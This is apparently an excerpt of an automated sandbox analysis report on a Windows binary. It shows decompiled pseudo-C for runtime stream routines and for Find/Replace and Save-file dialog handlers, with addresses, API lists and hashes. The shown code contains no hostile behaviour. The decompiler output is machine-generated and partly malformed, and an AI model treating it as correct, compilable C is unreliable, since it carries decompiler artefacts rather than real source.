                                                  Function 010B52E1 Relevance: 9.1, APIs: 6, Instructions: 136COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E010B52E1(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E010A732B(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E010A66B0(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if((_t79 & 0x00000082) != 0) {
						__eflags = _t79 & 0x00000040;
						if((_t79 & 0x00000040) == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
									_t64 = E010A4BEE();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E010AE41E(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E010A4BEE();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E010AE1D7(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E010A9CE9(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x10c1560;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10c2de0 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E010A7180(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E010A9CE9(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E010A6117())) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E010A6117())) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}





























                                                  0x010b52e6
                                                  0x010b52ed
                                                  0x010b52f5
                                                  0x010b52fa
                                                  0x010b5300
                                                  0x010b5303
                                                  0x010b5305
                                                  0x010b5308
                                                  0x010b5317
                                                  0x010b531a
                                                  0x010b5336
                                                  0x010b5338
                                                  0x010b533b
                                                  0x010b5350
                                                  0x010b5356
                                                  0x010b5359
                                                  0x010b535c
                                                  0x010b535f
                                                  0x010b5364
                                                  0x010b5366
                                                  0x010b536e
                                                  0x010b5370
                                                  0x010b537e
                                                  0x010b537f
                                                  0x010b5385
                                                  0x010b5387
                                                  0x00000000
                                                  0x00000000
                                                  0x010b5372
                                                  0x010b5372
                                                  0x010b537a
                                                  0x010b537c
                                                  0x010b5389
                                                  0x010b538a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010b537c
                                                  0x010b5370
                                                  0x010b5390
                                                  0x010b5397
                                                  0x010b5419
                                                  0x010b541d
                                                  0x010b5422
                                                  0x010b5423
                                                  0x010b5424
                                                  0x010b542b
                                                  0x010b5430
                                                  0x010b5436
                                                  0x00000000
                                                  0x010b5399
                                                  0x010b5399
                                                  0x010b53a1
                                                  0x010b53a6
                                                  0x010b53ab
                                                  0x010b53ae
                                                  0x010b53b1
                                                  0x010b53b3
                                                  0x010b53cc
                                                  0x010b53cf
                                                  0x010b53ec
                                                  0x010b53ec
                                                  0x010b53d1
                                                  0x010b53d1
                                                  0x010b53d4
                                                  0x00000000
                                                  0x010b53d6
                                                  0x010b53e3
                                                  0x010b53e3
                                                  0x010b53d4
                                                  0x010b53f1
                                                  0x010b53f5
                                                  0x00000000
                                                  0x010b53f7
                                                  0x010b53f7
                                                  0x010b53f9
                                                  0x010b53fa
                                                  0x010b53fb
                                                  0x010b53fc
                                                  0x010b5406
                                                  0x010b5409
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010b5409
                                                  0x010b53b5
                                                  0x010b53b5
                                                  0x010b53b6
                                                  0x010b53b7
                                                  0x010b53c0
                                                  0x010b540b
                                                  0x010b540e
                                                  0x010b5411
                                                  0x010b5438
                                                  0x010b5438
                                                  0x010b543b
                                                  0x010b5448
                                                  0x010b543d
                                                  0x010b543d
                                                  0x010b543d
                                                  0x010b543d
                                                  0x010b543d
                                                  0x00000000
                                                  0x010b543d
                                                  0x010b543b
                                                  0x010b53b3
                                                  0x010b533d
                                                  0x010b533d
                                                  0x010b5340
                                                  0x010b5343
                                                  0x010b53c7
                                                  0x010b5441
                                                  0x010b5441
                                                  0x010b5345
                                                  0x010b5348
                                                  0x010b5348
                                                  0x010b534b
                                                  0x010b534d
                                                  0x00000000
                                                  0x010b534d
                                                  0x010b5343
                                                  0x010b531c
                                                  0x010b5321
                                                  0x00000000
                                                  0x010b5321
                                                  0x010b530a
                                                  0x010b530f
                                                  0x010b5327
                                                  0x010b5327
                                                  0x010b532b
                                                  0x010b532b
                                                  0x010b544f
                                                  0x010b52ef
                                                  0x010b52f3
                                                  0x010b52f3

                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010B52E6
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Once$ExecuteInit__ioinit
                                                  • String ID:
                                                  • API String ID: 129814473-0
                                                  • Opcode ID: 6f40068b42d0fd35b7dba9d2c1691f0779a435e364168624dccffc416a1bef81
                                                  • Instruction ID: 833a5784a6de25f7adcfdf35e181e58674b31c7d8a2c3740963af601c17df2d7
                                                  • Opcode Fuzzy Hash: 6f40068b42d0fd35b7dba9d2c1691f0779a435e364168624dccffc416a1bef81
                                                  • Instruction Fuzzy Hash: 1241D471601B069BD7249B6CCCC1AEE7BE4AF41324F08C6ADE5E6877D1E7B4E8408B11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010AB4EA Relevance: 9.1, APIs: 6, Instructions: 134COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 89%
                                                  			E010AB4EA(void* __eflags, signed char _a4, intOrPtr* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr* _t92;

				_t44 = E010A732B(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E010A66B0(_t92);
					_t2 = _t92 + 0xc; // 0x66ce7cf0
					_t74 =  *_t2;
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if((_t74 & 0x00000082) != 0) {
						__eflags = _t74 & 0x00000040;
						if((_t74 & 0x00000040) == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t16 = _t92 + 0xc; // 0x66ce7cf0
								_t48 =  *_t16 & 0xffffffef | 0x00000002;
								 *(_t92 + 0xc) = _t48;
								 *(_t92 + 4) = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E010A4BEE();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E010AE41E(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E010A4BEE();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E010AE1D7(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags =  *(_t92 + 0xc) & 0x00000108;
								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E010A9CE9(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t24 = _t92 + 8; // 0x753b46c6
									_t87 =  *_t24;
									_t25 = _t87 + 1; // 0x753b46c7
									 *_t92 = _t25;
									_t26 = _t92 + 0x18; // 0x8b0d78fe
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									 *(_t92 + 4) =  *_t26 - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x10c1560;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10c2de0 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E010A7180(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E010A9CE9(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t35 = _t92 + 8; // 0x753b46c6
										_t45 = _a4;
										 *( *_t35) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 = _t92 + 0xc;
											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								 *(_t92 + 4) = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									 *(_t92 + 0xc) = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t14 = _t92 + 8; // 0x753b46c6
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 =  *_t14;
									 *(_t92 + 0xc) = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E010A6117();
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E010A6117();
						 *_t67 = 9;
						L6:
						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}


























                                                  0x010ab4ee
                                                  0x010ab4f5
                                                  0x010ab4fd
                                                  0x010ab502
                                                  0x010ab508
                                                  0x010ab508
                                                  0x010ab50b
                                                  0x010ab50d
                                                  0x010ab510
                                                  0x010ab51f
                                                  0x010ab522
                                                  0x010ab53c
                                                  0x010ab53e
                                                  0x010ab541
                                                  0x010ab556
                                                  0x010ab556
                                                  0x010ab55c
                                                  0x010ab55f
                                                  0x010ab562
                                                  0x010ab565
                                                  0x010ab56a
                                                  0x010ab56c
                                                  0x010ab574
                                                  0x010ab576
                                                  0x010ab584
                                                  0x010ab585
                                                  0x010ab58b
                                                  0x010ab58d
                                                  0x00000000
                                                  0x00000000
                                                  0x010ab578
                                                  0x010ab578
                                                  0x010ab580
                                                  0x010ab582
                                                  0x010ab58f
                                                  0x010ab590
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010ab582
                                                  0x010ab576
                                                  0x010ab596
                                                  0x010ab59d
                                                  0x010ab61b
                                                  0x010ab61c
                                                  0x010ab61d
                                                  0x010ab623
                                                  0x010ab624
                                                  0x010ab625
                                                  0x010ab62d
                                                  0x00000000
                                                  0x010ab59f
                                                  0x010ab59f
                                                  0x010ab59f
                                                  0x010ab5a4
                                                  0x010ab5a7
                                                  0x010ab5a9
                                                  0x010ab5ac
                                                  0x010ab5af
                                                  0x010ab5b2
                                                  0x010ab5b5
                                                  0x010ab5b7
                                                  0x010ab5d0
                                                  0x010ab5d3
                                                  0x010ab5f0
                                                  0x010ab5f0
                                                  0x010ab5d5
                                                  0x010ab5d5
                                                  0x010ab5d8
                                                  0x00000000
                                                  0x010ab5da
                                                  0x010ab5e7
                                                  0x010ab5e7
                                                  0x010ab5d8
                                                  0x010ab5f5
                                                  0x010ab5f9
                                                  0x00000000
                                                  0x010ab5fb
                                                  0x010ab5fb
                                                  0x010ab5fd
                                                  0x010ab5fe
                                                  0x010ab5ff
                                                  0x010ab605
                                                  0x010ab60a
                                                  0x010ab60d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010ab60d
                                                  0x010ab5b9
                                                  0x010ab5b9
                                                  0x010ab5ba
                                                  0x010ab5bb
                                                  0x010ab5c4
                                                  0x010ab60f
                                                  0x010ab60f
                                                  0x010ab612
                                                  0x010ab615
                                                  0x010ab62f
                                                  0x010ab62f
                                                  0x010ab632
                                                  0x010ab63d
                                                  0x010ab634
                                                  0x010ab634
                                                  0x010ab634
                                                  0x010ab634
                                                  0x010ab634
                                                  0x00000000
                                                  0x010ab634
                                                  0x010ab632
                                                  0x010ab5b7
                                                  0x010ab543
                                                  0x010ab543
                                                  0x010ab546
                                                  0x010ab549
                                                  0x010ab5cb
                                                  0x010ab638
                                                  0x010ab638
                                                  0x010ab54b
                                                  0x010ab54b
                                                  0x010ab54e
                                                  0x010ab54e
                                                  0x010ab551
                                                  0x010ab553
                                                  0x00000000
                                                  0x010ab553
                                                  0x010ab549
                                                  0x010ab524
                                                  0x010ab524
                                                  0x010ab529
                                                  0x00000000
                                                  0x010ab529
                                                  0x010ab512
                                                  0x010ab512
                                                  0x010ab517
                                                  0x010ab52f
                                                  0x010ab52f
                                                  0x010ab533
                                                  0x010ab533
                                                  0x010ab645
                                                  0x010ab4f7
                                                  0x010ab4fb
                                                  0x010ab4fb

                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010AB4EE
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Once$ExecuteInit__ioinit
                                                  • String ID:
                                                  • API String ID: 129814473-0
                                                  • Opcode ID: fe7d6689cbcf94f5ab8ce13beed21dd6a65b92488d2be3f12938d8bd378e3ab3
                                                  • Instruction ID: a1bd2350afacca97252c58100902b6f9b40510d43ea01d561ca521fc01868a7b
                                                  • Opcode Fuzzy Hash: fe7d6689cbcf94f5ab8ce13beed21dd6a65b92488d2be3f12938d8bd378e3ab3
                                                  • Instruction Fuzzy Hash: 3D41F1B1500B069ED7249FFDC891BBA7BE49F49330B88875DD9E6C72D1E678E8008B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A15A0 Relevance: 9.1, APIs: 6, Instructions: 70windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A15A0(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				void* _v524;
				void* _t10;
				int _t16;
				void* _t18;
				struct HWND__* _t19;
				unsigned int _t23;
				long _t25;

				_t10 = _a8 - 0x4e;
				if(_t10 == 0) {
					if( *((intOrPtr*)(_a16 + 8)) == 0xfffffda6 &&  *0x10c4c8c != 0) {
						SendMessageW(GetParent(_a4), 0x465, 0,  &_v524);
						_t16 = E010A14B0( &_v524);
						if(_t16 != 0xffffffff) {
							 *0x10c4c88 = _t16;
							SendMessageW( *0x10c2db0, 0x14e, _t16, 0);
						}
					}
					goto L11;
				} else {
					_t18 = _t10 - 0xc2;
					if(_t18 == 0) {
						_t19 = GetDlgItem(_a4, 0x191);
						 *0x10c2db0 = _t19;
						SendMessageW(_t19, 0x14e,  *0x10c4c88, 0);
						return 0;
					} else {
						if(_t18 != 1) {
							L11:
							return 0;
						} else {
							_t23 = _a12;
							if(_t23 != 0x191 || _t23 >> 0x10 != 1) {
								goto L11;
							} else {
								_t25 = SendMessageW( *0x10c2db0, 0x147, 0, 0);
								_t26 =  ==  ? 0 : _t25;
								 *0x10c4c88 =  ==  ? 0 : _t25;
								return 0;
							}
						}
					}
				}
			}










                                                  0x010a15ac
                                                  0x010a15af
                                                  0x010a1643
                                                  0x010a1666
                                                  0x010a1672
                                                  0x010a167a
                                                  0x010a168a
                                                  0x010a168f
                                                  0x010a168f
                                                  0x010a167a
                                                  0x00000000
                                                  0x010a15b5
                                                  0x010a15b5
                                                  0x010a15ba
                                                  0x010a1612
                                                  0x010a1620
                                                  0x010a162b
                                                  0x010a1636
                                                  0x010a15bc
                                                  0x010a15bd
                                                  0x010a1695
                                                  0x010a169a
                                                  0x010a15c3
                                                  0x010a15c3
                                                  0x010a15ce
                                                  0x00000000
                                                  0x010a15e0
                                                  0x010a15ef
                                                  0x010a15fa
                                                  0x010a15fd
                                                  0x010a1607
                                                  0x010a1607
                                                  0x010a15ce
                                                  0x010a15bd
                                                  0x010a15ba

                                                  APIs
                                                  • SendMessageW.USER32(00000147,00000000,00000000), ref: 010A15EF
                                                  • GetDlgItem.USER32 ref: 010A1612
                                                  • SendMessageW.USER32(00000000,0000014E,00000000), ref: 010A162B
                                                  • GetParent.USER32(FFFFFDA6), ref: 010A165F
                                                  • SendMessageW.USER32(00000000), ref: 010A1666
                                                  • SendMessageW.USER32(0000014E,00000000,00000000), ref: 010A168F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ItemParent
                                                  • String ID:
                                                  • API String ID: 2505470899-0
                                                  • Opcode ID: 2b614df32be0d711eba06838be48d0770797ecde824322c275039f576f0b5560
                                                  • Instruction ID: 6df2e01c03821161c55812c6b3c2245439df1d4947eced577bd5f408d4baee9d
                                                  • Opcode Fuzzy Hash: 2b614df32be0d711eba06838be48d0770797ecde824322c275039f576f0b5560
                                                  • Instruction Fuzzy Hash: 5A21C330200208AFEB709FB8DD89BA93BE4E708711F444652F9D8DA1E5EB7698508F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A24AC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 44%
                                                  			E010A24AC(void* __ebx) {
				struct HWND__* _t1;
				void* _t5;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t9 = __ebx + 1;
				asm("int3");
				asm("int3");
				_t1 =  *0x10c3f28;
				if(_t1 == 0) {
					asm("xorps xmm0, xmm0");
					asm("movq [0x10c50bc], xmm0");
					 *0x10c50c0 =  *0x10c3f24;
					asm("movq [0x10c50c4], xmm0");
					 *0x10c50c4 =  *0x10c3f20;
					asm("movq [0x10c50cc], xmm0");
					asm("movq [0x10c50d4], xmm0");
					asm("movq [0x10c50dc], xmm0");
					0x10c50bc->lStructSize = 0x28;
					 *0x10c50cc = 0x10c3fa0;
					 *0x10c50d4 = 0;
					 *0x10c50d0 = 0x10c41a8;
					 *0x10c50c8 = 0x10001;
					_t5 = ReplaceTextW(0x10c50bc);
					 *0x10c3f28 = _t5;
					__eflags = _t5;
					if(__eflags == 0) {
						_push(0x563);
						return E010A2DDC(_t9, _t10, _t11, _t12, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c");
					}
					return _t5;
				} else {
					return SetActiveWindow(_t1);
				}
			}









                                                  0x010a24ac
                                                  0x010a24ae
                                                  0x010a24af
                                                  0x010a24b0
                                                  0x010a24b7
                                                  0x010a24c6
                                                  0x010a24c9
                                                  0x010a24d1
                                                  0x010a24db
                                                  0x010a24e3
                                                  0x010a24e8
                                                  0x010a24f2
                                                  0x010a24ff
                                                  0x010a2507
                                                  0x010a2511
                                                  0x010a251b
                                                  0x010a2520
                                                  0x010a252a
                                                  0x010a2534
                                                  0x010a253a
                                                  0x010a253f
                                                  0x010a2541
                                                  0x010a2543
                                                  0x00000000
                                                  0x010a2557
                                                  0x010a255a
                                                  0x010a24b9
                                                  0x010a24c0
                                                  0x010a24c0

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ActiveReplaceTextWindow__wassert
                                                  • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                  • API String ID: 172568423-3286657855
                                                  • Opcode ID: 6d23a6f575fb29b8f6ed9906f848d6bb661b8b10f1aad2351573576c110f220f
                                                  • Instruction ID: 2873199ecd9aab7e5cd1c5d3b4e0964ac411e1baf94780f30124e90bafac16c5
                                                  • Opcode Fuzzy Hash: 6d23a6f575fb29b8f6ed9906f848d6bb661b8b10f1aad2351573576c110f220f
                                                  • Instruction Fuzzy Hash: 4A011E78B21302CED760CFA9EC8469937F0B7AA7007604619F5C4DB248E7BB70448F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A23F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 45%
                                                  			E010A23F5(struct HWND__* __eax) {
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t11;

				if(__eax == 0) {
					asm("xorps xmm0, xmm0");
					asm("movq [0x10c50bc], xmm0");
					 *0x10c50c0 =  *0x10c3f24;
					asm("movq [0x10c50c4], xmm0");
					 *0x10c50c4 =  *0x10c3f20;
					asm("movq [0x10c50cc], xmm0");
					asm("movq [0x10c50d4], xmm0");
					asm("movq [0x10c50dc], xmm0");
					 *0x10c50bc = 0x28;
					 *0x10c50cc = 0x10c3fa0;
					 *0x10c50d4 = 0;
					 *0x10c50c8 = 0x10001;
					_t5 = FindTextW(0x10c50bc);
					 *0x10c3f28 = _t5;
					__eflags = _t5;
					if(__eflags == 0) {
						_push(0x541);
						return E010A2DDC(_t8, _t9, _t10, _t11, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c");
					}
					return _t5;
				} else {
					return SetActiveWindow(__eax);
				}
			}








                                                  0x010a23f7
                                                  0x010a2406
                                                  0x010a2409
                                                  0x010a2411
                                                  0x010a241b
                                                  0x010a2423
                                                  0x010a242a
                                                  0x010a2432
                                                  0x010a243f
                                                  0x010a2447
                                                  0x010a2451
                                                  0x010a245b
                                                  0x010a2461
                                                  0x010a246b
                                                  0x010a2471
                                                  0x010a2476
                                                  0x010a2478
                                                  0x010a247a
                                                  0x00000000
                                                  0x010a248e
                                                  0x010a2491
                                                  0x010a23f9
                                                  0x010a2400
                                                  0x010a2400

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ActiveFindTextWindow__wassert
                                                  • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                  • API String ID: 1223664302-3286657855
                                                  • Opcode ID: a222e0431ceba654ee954129b860e64573e60251c55e6d7f8cc393ad5068e298
                                                  • Instruction ID: 1be37648399eb3f74a3eb7ffc5055167b63b6c9fe264c08a227821bb027acbb4
                                                  • Opcode Fuzzy Hash: a222e0431ceba654ee954129b860e64573e60251c55e6d7f8cc393ad5068e298
                                                  • Instruction Fuzzy Hash: A1011D79B21703CED720DFA5ED8419936B0B76A3007608619F5C4DA208E7BF70848F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1540 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E010A1540(intOrPtr __ecx) {
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v60;
				signed int _v64;
				intOrPtr _v88;
				struct tagOFNA _v92;
				signed int _t12;
				intOrPtr _t16;

				_t16 = __ecx;
				E010A66E0( &_v92, 0, 0x58);
				_v92 = 0x58;
				_v40 = 0x806;
				_v88 = _t16;
				_v64 = L"output.prn";
				_v60 = 0x104;
				_v32 = L"prn";
				_t12 = GetSaveFileNameW( &_v92);
				asm("sbb eax, eax");
				return  ~_t12 & L"output.prn";
			}











                                                  0x010a154f
                                                  0x010a1551
                                                  0x010a155d
                                                  0x010a1564
                                                  0x010a156b
                                                  0x010a156e
                                                  0x010a1575
                                                  0x010a157c
                                                  0x010a1583
                                                  0x010a158b
                                                  0x010a1596

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
